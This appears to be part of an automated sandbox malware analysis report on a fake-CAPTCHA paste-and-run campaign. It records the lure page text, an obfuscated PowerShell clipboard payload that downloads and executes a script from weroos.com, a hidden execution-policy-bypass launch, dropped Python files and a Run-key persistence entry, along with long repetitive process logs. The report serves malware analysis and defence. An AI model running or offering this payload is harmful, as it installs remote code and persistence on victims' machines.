        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7F8E8AD0 pushad ; iretd 19_2_00007FFF7F8E8AD1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7F8E8A0B pushad ; iretd 19_2_00007FFF7F8E8A0C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7F8E8139 push ebx; ret 19_2_00007FFF7F8E813A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7F8E916C pushad ; iretd 19_2_00007FFF7F8E916D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7FBB69E9 push edi; ret 19_2_00007FFF7FBB69EA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7FBB69FC push edi; ret 19_2_00007FFF7FBB6A0A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7FBB6185 push ebx; ret 19_2_00007FFF7FBB61FA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7FBB4504 pushad ; ret 19_2_00007FFF7FBB4505
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7FBB5EC1 push ecx; ret 19_2_00007FFF7FBB5EDA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7FBB44C3 pushad ; ret 19_2_00007FFF7FBB44C4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7FBB22DD pushad ; ret 19_2_00007FFF7FBB2324
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7FBB5E84 push eax; ret 19_2_00007FFF7FBB5E85
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7FE4741E push cs; retf 19_2_00007FFF7FE4741F
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7FE40FF9 pushfd ; ret 19_2_00007FFF7FE40FFD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FFF7FE41887 push ds; ret 19_2_00007FFF7FE4189A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF7F697418 push cs; retf 20_2_00007FFF7F69741F
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF7F697934 push ebx; retf 20_2_00007FFF7F69793A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF7F835CC2 push esi; iretd 20_2_00007FFF7F835CC7
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF7FBB5B40 push ebx; ret 20_2_00007FFF7FBB5B42
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF7FBB5550 push ss; ret 20_2_00007FFF7FBB5565
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF7FBB5B50 push ebp; ret 20_2_00007FFF7FBB5B62
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF7FBB3EE8 push es; ret 20_2_00007FFF7FBB3EF0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF7FBB5B09 push eax; ret 20_2_00007FFF7FBB5B0A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF7FBB5B1D push ecx; ret 20_2_00007FFF7FBB5B22
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF7FBB08CA push cs; ret 20_2_00007FFF7FBB08EA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF7FBB5EC2 push ds; ret 20_2_00007FFF7FBB5EC4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF7FBB0887 push cs; ret 20_2_00007FFF7FBB08EA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF7FBB5E4C push ss; ret 20_2_00007FFF7FBB5E4E

        Persistence and Installation Behavior

        barindex
        Detect drive by download via clipboard copy & paste
        Source: Chrome DOM: 4.6OCR Text: REGION SELECTOR It looks like you are visiting us from outside the IJS Would you prefer to access our dedicated Euro ean website, which offers tailored, region-specific in Complete these Verification Steps To better prove you are not a robot, please: Press & hold the Windows Key + R. 1. 2. In the verification window, press Ctrl + V. ENGLISH 3. Press Enter on your keyboard to finish. You will observe and agree: "1 at, not - reCAPTCHA Perfrm the steps above to VERIFY finish verification.
        Found pyInstaller with non standard icon
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"
        HTML page adds supicious text to clipboard
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeClipboard modification: powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_msi.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_queue.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\unicodedata.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_multiprocessing.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_hashlib.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_ssl.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\python.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\python311.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_sqlite3.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_socket.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\winsound.pydJump to dropped file
        Source: C:\Temp\PyEnv\python.exeFile created: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-arm64.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\select.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\sqlite3.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\libssl-3.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_ctypes.pydJump to dropped file
        Source: C:\Temp\PyEnv\python.exeFile created: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-32.exeJump to dropped file
        Source: C:\Temp\PyEnv\python.exeFile created: C:\Temp\PyEnv\Scripts\pip3.11.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_decimal.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_zoneinfo.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_asyncio.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_elementtree.pydJump to dropped file
        Source: C:\Temp\PyEnv\python.exeFile created: C:\Temp\PyEnv\Scripts\pip3.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_uuid.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_lzma.pydJump to dropped file
        Source: C:\Temp\PyEnv\python.exeFile created: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_overlapped.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\vcruntime140.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\pythonw.exeJump to dropped file
        Source: C:\Temp\PyEnv\python.exeFile created: C:\Temp\PyEnv\Scripts\wheel.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\vcruntime140_1.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\_bz2.pydJump to dropped file
        Source: C:\Temp\PyEnv\python.exeFile created: C:\Temp\PyEnv\Lib\site-packages\setuptools\cli-64.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\pyexpat.pydJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\libffi-8.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\libcrypto-3.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\python3.dllJump to dropped file
        Source: C:\Temp\PyEnv\python.exeFile created: C:\Temp\PyEnv\Scripts\pip.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Temp\PyEnv\LICENSE.txtJump to behavior

        Boot Survival

        barindex
        Creates autostart registry keys with suspicious values (likely registry only malware)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyPower powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyPowerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyPowerJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
